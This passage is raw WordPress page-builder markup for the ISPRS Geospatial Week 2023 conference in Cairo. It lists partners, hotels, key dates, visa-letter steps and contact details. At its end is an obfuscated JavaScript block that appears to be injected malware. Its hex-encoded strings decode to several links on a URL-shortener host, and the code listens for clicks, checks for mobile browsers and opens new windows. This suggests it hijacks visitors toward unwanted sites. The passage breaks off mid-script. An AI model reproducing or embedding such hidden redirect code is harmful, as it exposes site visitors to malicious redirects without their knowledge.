Participants.</p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\r\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\r\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span>\r\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span>\r\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span>\r\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\r\n\r\n<h1 style=\"text-align: center;\">Journals partner</h1>\r\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\r\n\r\n<h3></h3>\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\r\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]\r\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\r\n[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\r\n<h5></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\r\n<h4></h4>\r\n<img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" />\r\n\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]\r\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\r\n<h4></h4>\r\n<a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a>\r\n\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570507588{margin-top: 50px !important;}\"]\r\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\r\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Pharaohs Cruising Restaurant</strong></h5>\r\n<img class=\"alignnone size-medium wp-image-4791 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/828c1ce1-4aca-4e92-a1e0-3d71a816c9fc-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]\r\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\r\n<h5 style=\"text-align: center;\">Dinner and Show on the Prime Le Lac Du Caire</h5>\r\n<img class=\"alignnone size-medium wp-image-4793 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/6c0414f1-abcc-46a4-8e17-e17eb60be7b5-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]\r\n<ul>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\r\n</li>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\r\n</li>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\r\n</li>\r\n</ul>\r\n[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]\r\n<h2 style=\"text-align: center;\"></h2>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\r\n[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]\r\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\r\n[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]\r\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\r\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\r\n<span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]\r\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\r\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\r\n[/vc_column_text][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(